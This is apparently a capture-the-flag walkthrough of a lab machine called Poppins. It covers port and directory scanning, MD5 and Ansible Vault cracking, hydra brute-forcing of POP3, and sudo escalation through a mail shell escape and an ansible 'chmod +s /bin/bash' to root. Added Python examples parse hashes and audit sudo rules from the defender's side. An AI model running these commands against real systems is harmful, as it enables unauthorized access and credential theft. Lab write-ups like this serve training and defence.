poppips-mazasec-wp #
Port scanning #
nmap scan: ports 110 and 995 (mail) show up. -sV does version detection, -sC runs the default scripts.
└─# nmap 172.20.10.2 -sV -sC
Starting Nmap 7.92 ( https://nmap.org ) at 2025-09-03 02:47 EDT
Nmap scan report for interstellar.dsz (172.20.10.2)
Host is up (0.000066s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Mary Poppins - A Timeless Classic
|_http-server-header: Apache/2.4.62 (Debian)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL SASL(PLAIN) AUTH-RESP-CODE USER PIPELINING TOP STLS CAPA
| ssl-cert: Subject: commonName=PyCrt.PyCrt
| Subject Alternative Name: DNS:PyCrt.PyCrt
| Not valid before: 2025-04-01T14:05:29
|_Not valid after: 2035-03-30T14:05:29
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: USER SASL(PLAIN) RESP-CODES UIDL CAPA TOP AUTH-RESP-CODE PIPELINING
| ssl-cert: Subject: commonName=PyCrt.PyCrt
| Subject Alternative Name: DNS:PyCrt.PyCrt
| Not valid before: 2025-04-01T14:05:29
|_Not valid after: 2035-03-30T14:05:29
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:B7:B0:C2 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.47 seconds
Nothing special here.
Directory scanning #
Run dirsearch against it.
[02:49:32] Starting:
[02:49:32] 403 - 276B - /.ht_wsr.txt
[02:49:32] 403 - 276B - /.htaccess.bak1
[02:49:32] 403 - 276B - /.htaccess.sample
[02:49:32] 403 - 276B - /.htaccess.orig
[02:49:32] 403 - 276B - /.htaccess.save
[02:49:32] 403 - 276B - /.htaccess_sc
[02:49:32] 403 - 276B - /.htaccess_extra
[02:49:32] 403 - 276B - /.htaccess_orig
[02:49:32] 403 - 276B - /.htaccessOLD
[02:49:32] 403 - 276B - /.htaccessBAK
[02:49:32] 403 - 276B - /.htaccessOLD2
[02:49:32] 403 - 276B - /.htm
[02:49:32] 403 - 276B - /.html
[02:49:32] 403 - 276B - /.htpasswds
[02:49:32] 403 - 276B - /.htpasswd_test
[02:49:32] 403 - 276B - /.httr-oauth
[02:49:33] 403 - 276B - /.php
[02:49:50] 301 - 306B - /s -> http://172.20.10.2/s/
Note the /s here. A single-letter directory like this usually turns out to be a nested URL, so use dirb to recurse into it automatically.
[02:49:50] 403 - 276B - /server-status/
[02:49:50] 403 - 276B - /server-status
Dirb scan
dirb http://172.20.10.2 -w /root/zidianjiheinkali/dir/directory-list-2.3-medium.txt
xxxxx (output omitted)
---- Entering directory: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/ ----
==> DIRECTORY: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/
---- Entering directory: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/ ----
==> DIRECTORY: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
---- Entering directory: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/ ----
+ http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/index.html
Visiting index.html gives a hint about backups, so we just scan for backup file extensions.
gobuster dir -u http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,bak,backup,old,~
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,backup,old,~,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 276]
/index.html (Status: 200) [Size: 1531]
/hash.bak (Status: 200) [Size: 3300]
/.html (Status: 403) [Size: 276]
Progress: 1323360 / 1323366 (100.00%)
Found hash.bak. Every line is 32 hex characters, so these are MD5 hashes; crack them with john.
xxxxxx
36038680b0a4dd318339c7d6f14e27d7
9128262fabd151136a4f5173c9f8b687
a16529ed27831262cbfb879bdb372813
c3c016a1ded2e9139566365156ac0e10
2118c709cb65868d19cc0eb70a1fd603
1a4d5a0bd8e7ae4c52b75116e261ff53
2ce6a8451b97c9fbf126feaabc020cfe
df5f5384aad29a7fd6530a00007c2321
18e117c28e23c72258ed6b586c64d79a
xxx
When cracking with john, the format has to be given explicitly as raw MD5:
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 100 password hashes with no different salts (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
kent12 (?)
amotejoel (?)
sunjoo (?)
iydgmvin (?)
elised (?)
530223 (?)
viking35 (?)
naughtycat (?)
shadow626 (?)
middelweg (?)
eloscar (?)
cash1407 (?)
carlosmoya (?)
xytyx1972 (?)
vanity17 (?)
v0nowns. (?)
teadorohector (?)
taroh527 (?)
susancliford (?)
suicida*02 (?)
snoopymai12277++ (?)
xxxxxxx
Clean the extra symbols out of john's output and save the passwords to a file to brute-force the mail port, since SSH only allows key login and cannot be brute-forced. Collect the usernames from the homepage.
Brute-forcing POP #
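Added example, not part of the writeup: a small Python helper for the two steps above. It confirms that every line of hash.bak is a plain 32-hex digest (the length check behind "this is MD5"; an NTLM hash looks identical, which is why john's --format is a choice you make rather than something it detects) and turns john's "password (?)" lines into a clean wordlist without stripping characters that belong to the password (v0nowns., snoopymai12277++). Both sample inputs are constructed from a few lines of the output shown above.

```python
import re

# Constructed sample shaped like hash.bak: three hashes from above, one duplicate, one junk line
SAMPLE_HASH_FILE = """36038680b0a4dd318339c7d6f14e27d7
9128262fabd151136a4f5173c9f8b687
a16529ed27831262cbfb879bdb372813
36038680b0a4dd318339c7d6f14e27d7
not-a-hash
"""

# Constructed sample shaped like john's live output above: status lines plus cracked entries
SAMPLE_JOHN_OUTPUT = """Using default input encoding: UTF-8
Loaded 100 password hashes with no different salts (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
kent12           (?)
v0nowns.         (?)
snoopymai12277++ (?)
suicida*02       (?)
"""

# Unsalted hex digests can only be told apart by length; 32 hex chars fits both MD5 and NTLM,
# which is why john needs --format=raw-md5 spelled out instead of guessing.
LENGTH_TO_FORMATS = {32: ["raw-md5", "nt"], 40: ["raw-sha1"], 64: ["raw-sha256"], 128: ["raw-sha512"]}
HEX_LINE = re.compile(r"^[0-9a-f]+$")


def classify_hashes(text):
    """Map each unique well-formed hash to the john formats it could be; junk lines are dropped."""
    result = {}
    for raw in text.splitlines():
        h = raw.strip().lower()
        if HEX_LINE.match(h) and len(h) in LENGTH_TO_FORMATS:
            result.setdefault(h, LENGTH_TO_FORMATS[len(h)])
    return result


# john prints a cracked entry as "<password><padding>(<login>)"; with no login column the login is "?".
# The login group forbids spaces, so the "Loaded ... (Raw-MD5 [...])" status line does not match.
CRACKED_LINE = re.compile(r"^(?P<pw>\S.*?)\s+\((?P<login>[^()\s]*)\)$")


def john_output_to_wordlist(text):
    """Collect passwords from john's output in order, without duplicates, keeping symbols intact.

    Only the padding before "(login)" is removed; a password that itself ends in
    whitespace would lose it here, which is the one case this parser cannot recover.
    """
    seen, words = set(), []
    for line in text.splitlines():
        m = CRACKED_LINE.match(line)
        if not m:
            continue
        pw = m.group("pw")
        if pw not in seen:
            seen.add(pw)
            words.append(pw)
    return words


if __name__ == "__main__":
    for h, fmts in classify_hashes(SAMPLE_HASH_FILE).items():
        print(h, "->", "/".join(fmts))
    print("\n".join(john_output_to_wordlist(SAMPLE_JOHN_OUTPUT)))
```

The same length check is what a defender runs when triaging a leaked backup like hash.bak: 32-hex, unsalted digests of user passwords are crackable offline at wordlist speed, so the finding is the storage format itself, not just the weak passwords it held.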
hydra -L user.txt -P password.txt pop3://172.20.10.2:110 -V -I -f -u -t 64 -e nsr
xxxxx
[110][pop3] host: 172.20.10.2 login: Bert password: jmac92777
Log in with it.
Log in to POP3 with telnet to read the mail. The commands: USER <username>, PASS <password>, LIST to list all messages, RETR <n> to read the selected one.
┌──(root㉿kali)-[~]
└─# telnet 172.20.10.2 110
Trying 172.20.10.2...
Connected to 172.20.10.2.
Escape character is '^]'.
+OK Dovecot (Debian) ready
USER Bert
+OK
PASS jmac92777
+OK Logged in.
LIST
+OK 1 messages:
1 1517
.
RETR 1
+OK 1517 octets
Return-path: <jane@poppins>
Envelope-to: bert@poppins
Delivery-date: Fri, 29 Aug 2025 06:33:49 -0400
Received: from jane by Poppins with local (Exim 4.94.2)
(envelope-from <jane@poppins>)
id 1urwQW-0001RQ-CD
for bert@poppins; Fri, 29 Aug 2025 06:33:48 -0400
To: bert@poppins
Subject: Urgent: Prod Server Credentials for Ansible Playbook
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1urwQW-0001RQ-CD@Poppins>
From: jane@poppins
Date: Fri, 29 Aug 2025 06:33:48 -0400
Hi Bert,
I've just finished the new Ansible playbook for the a-27 software deployment on our main production server, `web01.poppins.dsz`. It's ready to go.
The playbook contains some sensitive API keys, so I've encrypted the variables using Ansible Vault. You'll need to use the `ansible-vault decrypt` command to run it.
Here is the vault string you'll need to paste into the `secrets.yml` file.
```
$ANSIBLE_VAULT;1.1;AES256
66626631636362303332633238373338386634373434646532656534323230333938303331663630
3236333934663930343263363831353138323630393134320a366366393939373636386538336336
34353536656637313762323832643339633234656635326137633439303730373335386536306436
6335363366376634630a326563623737626337353436323565643365333061663661396337613731
3730
```
Let me know if you hit any issues. We need to get this deployed by EOD.
Thanks,
Jane
Decrypting the Ansible Vault secret #
Found an Ansible Vault string. Use ansible2john.py to convert it into a hash for cracking.
JohnTheRipper/run/ansible2john.py at bleeding-jumbo · big-main/JohnTheRipper
python3 ansible2john.py secert.yml
secert.yml:$ansible$0*0*fbf1ccb032c287388f4744de2ee4220398031f6026394f9042c6815182609142*2ecb77bc754625ed3e30af6a9c7a7170*6cf9997668e83c64556ef717b282d39c24ef52a7c490707358e60d6c563f7f4c
john --wordlist=/usr/share/wordlists/rockyou.txt secert.yml
secert.yml:javiel
The vault password is javiel. Now use ansible-vault to decrypt it, which yields the password cumibug. This tool is picky about the Python environment, so it is easiest to create a virtual environment.
Create and activate the environment:
python3.12 -m venv ansible-env
source /root/ansible-env/bin/activate
Leave it with deactivate.
└─# ansible-vault decrypt secert.yml
Vault password:
Decryption successful
┌──(ansible-env)─(root㉿kali)-[~/ansible-env]
└─# cat secert.yml
cumibug
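Added example, not part of the writeup and not Ansible's own code: the vault string from the mail above decoded by hand in Python, to show what ansible2john.py extracts and what john actually tests. An $ANSIBLE_VAULT;1.1;AES256 body is hex of three newline-separated hex fields: a 32-byte salt, an HMAC-SHA256 tag over the ciphertext, and the AES-256-CTR ciphertext. PBKDF2-HMAC-SHA256 with 10000 rounds stretches the vault password into key1 (AES), key2 (HMAC) and the IV, so a password candidate can be checked with the HMAC alone, and that is all a cracker needs. The block rebuilds the exact $ansible$ line shown above and confirms javiel using only hashlib; recovering cumibug itself needs AES-CTR and is left to ansible-vault as above. The vault text is the page's own; the label secert.yml is the page's file name.

```python
import hashlib
import hmac
from binascii import unhexlify

# The vault body from the mail above (the page's own value, header line left out)
VAULT_BODY = (
    "66626631636362303332633238373338386634373434646532656534323230333938303331663630"
    "3236333934663930343263363831353138323630393134320a366366393939373636386538336336"
    "34353536656637313762323832643339633234656635326137633439303730373335386536306436"
    "6335363366376634630a326563623737626337353436323565643365333061663661396337613731"
    "3730"
)


def parse_vault(text):
    """Split a vault 1.1 body into (salt, hmac_tag, ciphertext) bytes.

    The outer hex wraps "hex(salt)\\nhex(hmac)\\nhex(ciphertext)"; the header line
    "$ANSIBLE_VAULT;1.1;AES256" is skipped if present.
    """
    lines = [l.strip() for l in text.split("\n") if l.strip()]
    if lines and lines[0].startswith("$ANSIBLE_VAULT"):
        lines = lines[1:]
    inner = unhexlify("".join(lines))
    salt_hex, tag_hex, ct_hex = inner.split(b"\n")
    return unhexlify(salt_hex), unhexlify(tag_hex), unhexlify(ct_hex)


def to_john_format(text, label="secert.yml"):
    """Rebuild the $ansible$ line ansible2john.py prints: salt, ciphertext, hmac (in that order)."""
    salt, tag, ct = parse_vault(text)
    return "%s:$ansible$0*0*%s*%s*%s" % (label, salt.hex(), ct.hex(), tag.hex())


def derive_keys(password, salt):
    """Vault 1.1 KDF: PBKDF2-HMAC-SHA256, 10000 rounds, 80 bytes laid out as key1 | key2 | iv."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 10000, dklen=80)
    return dk[:32], dk[32:64], dk[64:80]


def check_password(text, password):
    """True iff HMAC-SHA256(key2, ciphertext) equals the stored tag, i.e. the password is right."""
    salt, tag, ct = parse_vault(text)
    _key1, key2, _iv = derive_keys(password, salt)
    return hmac.compare_digest(hmac.new(key2, ct, hashlib.sha256).digest(), tag)


if __name__ == "__main__":
    salt, tag, ct = parse_vault(VAULT_BODY)
    print("salt %d bytes, hmac %d bytes, ciphertext %d bytes" % (len(salt), len(tag), len(ct)))
    print(to_john_format(VAULT_BODY))
    print("javiel correct:", check_password(VAULT_BODY, "javiel"))
```

Two things worth noticing: the ciphertext is a single 16-byte block, so the vault held only a short padded plaintext, and the whole cost of a wrong guess is one PBKDF2 run of 10000 rounds. The format is sound; the weakness in this chain is a vault password that sits in rockyou.txt, and the fix on the defender's side is a long random vault password kept out of mailboxes.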
I got stuck here and didn't know what this was for. Earlier I had also obtained a user; the other users don't accept this password, but this user does.
Escalating to the main user #
ssh jane@172.20.10.2 with password javiel. sudo -l for this user shows nothing.
su michael with password cumibug. sudo -l shows (winifred) PASSWD: /usr/bin/mail *. PASSWD means you enter your own password to run it; winifred's password is not needed.
Escalation to the winifred user:
sudo -u winifred /usr/bin/mail -f /etc/passwd
michael@Poppins:~$ sudo -u winifred /usr/bin/mail -f /etc/passwd
Mail version 8.1.2 01/15/2001. Type ? for help.
"/etc/passwd": 0 messages [Read only]
&
& whoami
Unknown command: "whoami"
& !/bin/bash
winifred@Poppins:/home/michael$ whoami
winifred
winifred@Poppins:/home/michael$ sudo -l
Matching Defaults entries for winifred on Poppins:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User winifred may run the following commands on Poppins:
(ALL) NOPASSWD: /usr/bin/ansible *
winifred@Poppins:/home/michael$ pwd
Escalating to root #
This user can run ansible, an operations automation tool. Executing a command through it:
sudo /usr/bin/ansible localhost -c local -m command -a "chmod +s /bin/bash"
winifred@Poppins:~$ sudo /usr/bin/ansible localhost -c local -m command -a "chmod +s /bin/bash"
[WARNING]: No inventory was parsed, only implicit localhost is available
[WARNING]: Consider using the file module with mode rather than running 'chmod'. If you need to use command because file is insufficient you can add 'warn: false' to this command task or set 'command_warnings=False' in ansible.cfg to get rid of this message.
localhost | CHANGED | rc=0 >>
winifred@Poppins:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
winifred@Poppins:~$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0# cat /root/root.txt
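Added example, not from the writeup, written from the defender's side: a Python audit of the two sudo rules that made this chain work, plus a check for the setuid shell left behind at the end. It parses sudo -l output (the constructed sample copies the winifred rules seen above and adds a benign one), flags commands that can run arbitrary commands or drop to a shell (mail through its ! escape, ansible through its command module, both shown above), wildcard arguments and NOPASSWD, and scans ls -l rows for a root-owned setuid shell like the /bin/bash above. SHELL_CAPABLE is a hypothetical auditor-maintained set, and both samples are constructed.

```python
import re

# Constructed sample: the winifred rules from the sudo -l output above plus one benign rule
SUDO_L_OUTPUT = r"""Matching Defaults entries for winifred on Poppins:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User winifred may run the following commands on Poppins:
    (winifred) PASSWD: /usr/bin/mail *
    (ALL) NOPASSWD: /usr/bin/ansible *
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# Constructed sample of `ls -l` rows: the setuid bash from above and a normal /bin/sh
LS_OUTPUT = """-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
-rwxr-xr-x 1 root root  121464 Jan  1 2020 /bin/sh
"""

# Hypothetical auditor-maintained set: binaries that run arbitrary commands once sudo hands them
# over (mail via its ! escape, ansible via its command module, as shown above) or are shells outright.
SHELL_CAPABLE = {"/usr/bin/mail", "/usr/bin/ansible", "/bin/bash", "/bin/sh"}
SHELLS = {"/bin/bash", "/bin/sh"}

# "(runas) TAG: TAG: /path/to/cmd args"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S+)\s*(?P<args>.*)$")


def parse_sudo_l(text):
    """Return the command rules from `sudo -l` output as dicts (runas, tags, cmd, args)."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # everything after this header is a rule line
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        rules.append({
            "runas": m.group("runas").split(":")[0].strip(),  # "(root : root)" -> "root"
            "tags": {t.rstrip(":") for t in m.group("tags").split()},
            "cmd": m.group("cmd"),
            "args": m.group("args").strip(),
        })
    return rules


def audit(rules):
    """Flag rules that grant more than they appear to; severity reflects who the command runs as."""
    findings = []
    for r in rules:
        reasons = []
        if r["cmd"] in SHELL_CAPABLE:
            reasons.append("command can run arbitrary commands or spawn a shell")
        if r["args"].endswith("*"):
            reasons.append("wildcard arguments let the caller choose what is passed")
        if "NOPASSWD" in r["tags"]:
            reasons.append("no password required")
        if not reasons:
            continue
        root_equiv = r["runas"] in ("ALL", "root")
        if r["cmd"] in SHELL_CAPABLE:
            severity = "critical" if root_equiv else "high"
        else:
            severity = "medium"
        findings.append({"rule": "(%s) %s %s" % (r["runas"], r["cmd"], r["args"]),
                         "severity": severity, "reasons": reasons})
    return findings


# mode, links, owner, group, size, month, day, year-or-time, path
LS_ROW = re.compile(r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<path>\S+)$")


def setuid_root_shells(ls_output):
    """Paths of root-owned shells whose set-uid bit is on (an 's' or 'S' in the owner-execute slot)."""
    hits = []
    for line in ls_output.splitlines():
        m = LS_ROW.match(line)
        if m and m.group("owner") == "root" and m.group("mode")[3] in "sS" and m.group("path") in SHELLS:
            hits.append(m.group("path"))
    return hits


if __name__ == "__main__":
    for f in audit(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f["severity"].upper(), f["rule"], "-", "; ".join(f["reasons"]))
    print("setuid root shells:", setuid_root_shells(LS_OUTPUT))
```

The ansible rule is the critical one: (ALL) NOPASSWD on a tool whose job is running commands is a root shell by definition, and the warning Ansible printed above about the command module is not a control. The mail rule rates high rather than critical only because it runs as winifred; it is still a full shell as that user. The setuid check catches the persistence left by chmod +s, which survives until someone looks.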
Takeaways #
1. Backup file extensions: html,bak,backup,old,~
2. ansible2john.py, then crack with john
3. Specify MD5 when cracking: john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash
4. Collecting usernames and passwords during a pentest